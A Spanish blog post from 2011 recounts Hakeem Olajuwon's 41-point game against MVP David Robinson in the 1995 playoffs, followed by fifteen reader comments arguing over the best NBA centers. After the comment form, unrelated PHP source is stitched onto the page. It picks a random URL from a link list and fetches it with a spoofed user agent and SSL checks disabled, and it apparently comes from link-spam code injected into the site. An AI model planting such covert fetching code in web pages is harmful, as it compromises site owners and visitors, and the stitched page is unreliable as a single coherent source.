Partidos históricos: Asesinar a un MVP

06 de October de 2011 por TheDeerHunter

No hablaremos de un “cualquiera”. David Robinson es uno de los mejores centers que hayamos visto y también uno de los más completos. No ha habido muchos después de él que se hayan marcado cuádruples dobles, que con la mano izquierda fuera el mejor defensor de la liga y con la derecha el máximo anotador.

La primera mitad de los 90 había sido individualmente suya. Rookie del año en el 90, mejor defensor en el 92, quinteto ideal y defensivo en el 91 y en el 92, el Dream Team… Difícilmente se pueden discutir sus méritos en aquellos primeros 5 años de su carrera, con unos promedios de 25 puntos, 12 rebotes, 3 asistencias y ¡casi 4 tapones!

Estaba llamado a ser un mito desde el principio y en la temporada 94-95 atravesaba su cénit individual, logrando el esperado MVP, que ya había merecido en alguna otra ocasión.

Con todo ganado individualmente aquel año todo indicaba que había llegado su momento. Los Spurs habían liderado la liga con una plantilla de escándalo. Al lado del almirante estaba un tal Dennis Rodman con 17 rebotitos por noche. En las alas, una tríada envidiable con un Sean Elliott sano, Vinny Del Negro y Chuck Person. Inteligentes y eficaces bases como Avery Johnson o Doc Rivers y de guinda otros nombres que podrían sonaros como Terry Cummings o el gran Moses Malone, todavía en activo (aunque lógicamente contando sus últimos saltos)

En definitiva, ante unos Rockets decepcionantes (los vigentes campeones) y una conferencia Este en plena crisis existencial por la primera retirada de Jordan, los Spurs eran claros favoritos al anillo. Parecía confirmarlo la barrida que le pegaron a Denver en primera ronda y la cómoda eliminación de Lakers.

Pero aquí entra aquello de “Nunca subestimes el corazón del campeón”. Houston había terminado con 47 victorias y las pasaba canutas para eliminar a Utah y Phoenix, ambas eliminatorias resueltas en el último partido por 4 y 1 puntos respectivamente.

Así que se presentaba una final de conferencia antológica. Duelo de pívots como ya no se ven. Los dos últimos MVPs frente a frente. Equipos sólidamente armados en todos los aspectos, no en vano habían sido también los dos últimos campeones de la regular. Una de esas eliminatorias donde la única duda que surge es cómo de grande y de histórica va a ser.

Aunque es absolutamente recomendable revisar la serie en su totalidad (y más en la situación que nos encontramos), si tuviéramos que elegir un partido escogeríamos el segundo, celebrado en “El álamo”. El primero, para no variar, lo había ganado Houston por un único punto. Precisamente el día que le dieron el trofeo a David, para más inri. Pero en el segundo, 24 de Mayo de 1995, ocurrió lo más grande. Sujetaros, que vienen curvas:

Es por este tipo de cosas por las que uno ama el baloncesto, la plasticidad infinita. Con aquella mítica actuación delante de un titán como Robinson en plena forma, cobran sentido esos alias tan conocidos: “The Dream” o “El bailarín de claqué del Cotton Club” (cuanto te añoramos, Andrés). Y es que efectivamente ni habíamos visto ni posiblemente veremos nada igual a lo de aquella noche.

41 puntos, 16 rebotes, 4 asistencias, 3 robos y 2 tapones para la leyenda y aunque parezca imposible vuelve la máxima de que las cifras fueron lo de menos. Lo importante es cómo se consiguieron.

Podremos discutir si hemos visto algún pívot superior a Olajuwon en algunos aspectos. Pero la belleza con la que ese hombre desplegó el baloncesto es la cima en su posición. Será difícil volver a vivir un “sueño” como ese.

Comenta

15 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Qué grande Deer.
    Para mí Olajuwon es el mejor 5 de la historia, siempre lo he dicho. Se comió al Shaq joven e imparable, al mejor Robinson y al mejor Ewing. Y con una clase inigualable. Un ídolo

      Citar

  2. TheDeerHunter dice:
    #2

    En determinados aspectos sí ha sido el mejor de largo… y seguramente el que mejores sensaciones nos ha dejado. Algo único.
    Sobre lo de comerse a Shaq o ser mejor que otros ilustres… me picas la lengua. Pero este post no va a ser el lugar para rebatirlo.

      Citar

  3. Sancho88 dice:
    #3

    Debates, todos abiertos siempre. Chamberlain, Jabbar, Hakeem, Shaquille… Mi preferido es Hakeem, pero no se puede decir que haya sido el mejor cinco de todos los tiempos, temerario. Ahora bien, en lo que sí ha sido el mejor jugador de la historia, es en bailar dentro de la pintura, se le veía feliz ahí, no como a los nuevos pivots que huyen constantemente por no pegarse codazos. Olajuwon era plástico, era bello jugando, como bien dices Thedeer, para nada un tío bronco, sino un tío que se sabía situar defensivamente, ahí le veo ciertas similitudes a Ibaka, salvando toditas todas las distancias, evidentemente, y en ataque pues simplemente eso, pon la música Sinatra que este tío entra a bailar. Seguramente esa frase la podría haber dicho Andrés. Haciendo un simil futbolístico, tampoco se puede decir que Zidane haya sido el mejor jugador de la historia, pero oh dios mío, otro bailarín del deporte, gente que te hacían quedarte con los ojos abiertos y soñar. Yo he de decir que descubrí la NBA gracias a Olajuwon y a Ramón Trecet, obviamente. Hakeeeeeeeeeeeem Olajuwooooooooooooooooooon………………………………………………………………… BOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOM, O CATAPÚM!!, depende de como le pillara. Míticos aquellos enfrentamientos contra los Knikcs, madre de dios, yo me quedaba hipnotizado delante de la tele, y solo tendría seis o siete años. Me cagaba en Larry Johnson, en Pat Ewing, de lo buenos que eran. Además, jugaban siempre a más de cien puntos, a las orgías de puntos, como a mí me gusta decir. No os digo más de lo friki que era, porque si no tendría que contar que cuando anotaban 101 puntos, 103 etcétera, yo cogía el diccionario por esa página, y miraba qué palabras aparecían. No sé, creo que todos amamos un poco más la NBA con Olajuwon, y con el almirante, por supuesto. Ese duelo, o con Pat o con el primigenio Shaq, jamás se va a repetir. Hace muchos años que no está de moda el pívot dominante. Y eso que la pasada década, aún con Shaq a gran nivel, Duncan y Pau, se salvó un poco de la quema, pero me parece que esta década ya sí que va a ser de total sequía en esa posición, y es una pena, porque es donde se ven los duelos más bonitos, como se ha podido ver en los vídeos que has colgado.
    Excelente trabajo de documentación, Thedeer, y enhorabuena por tu artículo. Y si asombrosas son las estadísticas de Hakeem en esas finales, las que hizo contar Shaq y Penny el año anterior…. esas ya son para echarlas de comer aparte.

    Por cierto, quien no contaría con Casell y Horry jovencicos para ir a por un anillo (y con Fisher y Steve Kerr)? Santo dios, que manera de crecerse de estos jugadores secundarios cuando huele a título. Hay que recordar que los Celtics de la bicicletada de Pierce, no hubieran ganado ni de coña sin Casell y PJ Brown

      Citar

  4. Sancho88 dice:
    #4

    Rectifico, fue ese mismo año el anillo de Hakeem contra Shaq, no el año anterior que se lo ganaron a los Knicks. Me ha fallado la memoria. Si no os importa, y ya que ha salido el tema del segundo anillo de Houston, yo me curré un reportaje sobre Olajuwon hace dos años, precisamente hablando de lo que vino después de esa final de conferencia contra San Antonio.
    http://estrellasdelasalturas.blogspot.com/2009/11/el-bailarin-del-cotton-club.html
    Espero que no os moleste que lo ponga, pero no he podido resistir irme hacia el fondo de mi blog. Puede que algún dato sea erróneo, pero en general me pegué también una currada al archivo increíble.

      Citar

  5. TheDeerHunter dice:
    #5

    gran artículo, sancho e interesante blog que acabo de descubrir
    ¿cómo es que no te tenemos enlazado??
    ¡Txusma!!

      Citar

  6. Txusma dice:
    #6

    Solucionada la injusticia 😀

      Citar

  7. HisRoyalAirness dice:
    #7

    TheDeerHunter:
    En determinados aspectos sí ha sido el mejor de largo… y seguramente el que mejores sensaciones nos ha dejado. Algo único.
    Sobre lo de comerse a Shaq o ser mejor que otros ilustres… me picas la lengua. Pero este post no va a ser el lugar para rebatirlo.

    A ver, lo de comerse es un decir, me refiero a que, en los momentos cumbre de duelo directo Hakeem salía victorioso. Es al único pivot dominante al que Shaquille se ha enfrentado en unas finales y perdió y en palabrad de Big Cactus: “me superó en todos los aspectos”. Nunca me referiré a estadIstica.

    De los demás, aChamberlain le he visto pocos partidos y sí, era un animal pero con menos recursos, y a Kareem, al cual admiro infinito, ha tenido unos compañeros de equipo para cagarse.

    Por eso, siempre en mi opiniòn, el arsenal ofensivo, el dominio defensivo y la elegancia hacen que “The Dream” sea el mejor en mi lista

      Citar

  8. Txusma dice:
    #8

    Tengo pruebas de que para TheDeerHunter, Olajuwon es el 4º pívot de la historia:

    http://blog.tjnba.com/2009/06/29/los-mejores-centers-de-la-historia/

      Citar

  9. Sancho88 dice:
    #9

    ohh, que ilusion!! que me habeis agregado. si kereis mirarlo y frikaros a algo ahora que parece que la nba esta pachucha (o eso he leído por ahí, xd), me he currao la media de anotacion de pretemporada de la acb. por si quereis echaros unas viciadas al supermanager, así con las estadisticas de puntos y tal… estaría muy guapo hacer una liga privada de vuestra página, a competir contra vosotros que sois unos cracks de esto. que os parece la idea, para matar el mono de la vida sin nba?

      Citar

  10. TheDeerHunter dice:
    #10

    Txusma:
    Tengo pruebas de que para TheDeerHunter, Olajuwon es el 4º pívot de la historia:

    http://blog.tjnba.com/2009/06/29/los-mejores-centers-de-la-historia/

    Sabes de sobra que esa lista fue una votación colectiva.

      Citar

  11. TheDeerHunter dice:
    #11

    No lo quería hacer hoy, pero mira que os gusta tirarme.

    En los momentos cumbre Hakeem no salió victorioso. Salió específicamente en ese más por causa colectiva que otra cosa, con un equipo superior al de Shaq (por muy infravalorado que esté) en muchos aspectos y un sistema de ayudas diseñado por Tomjanovic que ayudó un montón para poder pararle.
    Orlando llegó a aquella final un poco verde. Me viene a la cabeza, por ejemplo, lo que pasó con Nick Anderson en el primer partido. Yo lo vi. Los vi todos.

    No fue Shaq quien falló aquella vez y en los siguientes enfrentamientos directamente jamás hubo color… y no es que de repente Olajuwon se retirara del panorama. La palabra “comer” sí podría aplicarse entonces y no a aquella final. Quizás tengamos la oportunidad de recordar alguno de esos enfrentamientos y volver a revivir el nivel demoledor del perro grande.

    Además de Shaq, en mi opinión hay todos los argumentos que se quieran para afirmar que como mínimo Chamberlain y Jabbar están por encima de Olajuwon. Aprovecho para recordar que Chamberlain, además de ser una mala bestia, fue líder de asistencias alguna vez… así que algún recurso tenía además de físico. Y Jabbar no siempre contó con equipos tan fabulosos como dices (además que independientemente de eso siempre se salió individualmente incluso bastante más que el nigeriano)
    De Russell tendría alguna duda más, pero tanto título debe de valer para algo, supongo.
    Mikan es otro rollo, aunque imagino que de tener los 5 MVPs que debió merecerse y los anillos que acumuló habría que tenerlo en consideración si hacemos este tipo de abstracciones.
    Y finalmente tampoco descartaría a Moses Malone en todo esto, y esto seguro que muchos apoyarían la moción.

    Yo sólo admito que la belleza del baloncesto de Olajuwon sí es insuperable en su posición y en ciertos aspectos sí es el mejor que he visto y que veré. Trató de imaginarme a Howard haciendo esas cosas y me entra la risa floja. Qué le vamos a hacer…

      Citar

  12. Txusma dice:
    #12

    TheDeerHunter: Sabes de sobra que esa lista fue una votación colectiva.

    😀

      Citar

  13. GreenPride dice:
    #13

    The Dream, el pivot con el que más he disfrutado en mi vida. Pura poesía en movimiento, el mejor juego de pies que nunca se ha visto dentro de las zonas… y un grandísimo defensor, varias veces máximo taponador y con un tiro desde 4-5 metros igualmente fenomenal. Sin duda uno de los mejores pivots de la historia pero ¿el mejor? Sin duda por números no lo ha sido. Ganó dos títulos y en sus mejores años impartió lecciones a Robinson y Ewing y al novel Shaq creo que le superó en aquella final con los Magic. Quizás sería mejor decir, el mejor 5 de su tiempo pero quizás algo por detras de Kareem o Wilt a nivel global aunque eso sí estéticamente insuperable.

      Citar

  14. HisRoyalAirness dice:
    #14

    A ver, está claro que cuando digo “el mejor” siempre va a ser mi opinión. Los argumentos de Deer son todos totalmente lógicos, es más, los comparto pero supongo que siempre tenemos a alguien un poquito por arriba por las sensaciones que nos transmitió en su momento y, en mi caso, Hakeem me transmitió las mejores.
    Shaq siempre me pareció una locura pero me transmitía más sensación de abuso que otra cosa (y son consciente de que no ha sido sólo eso). Recuerdo a los Pacers de Bird, que jugaban al baloncesto de maravilla pero no tenían a NADIE que le aguantase a Shaq en el poste bajo. Era imposible, no tenía rival alguno.
    La época de Hakeem fue muy bonita por los duelos que había, incluso recuerdo que es la única persona, junto a Chamberlain, que taponó el Sky Hook de Kareem. Ahí es nada.

      Citar

  15. Jose_Dantley dice:
    #15

    Para mí el mejor no, pero el “más bonito de ver” definitivamente. Qué maravilla de movimientos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>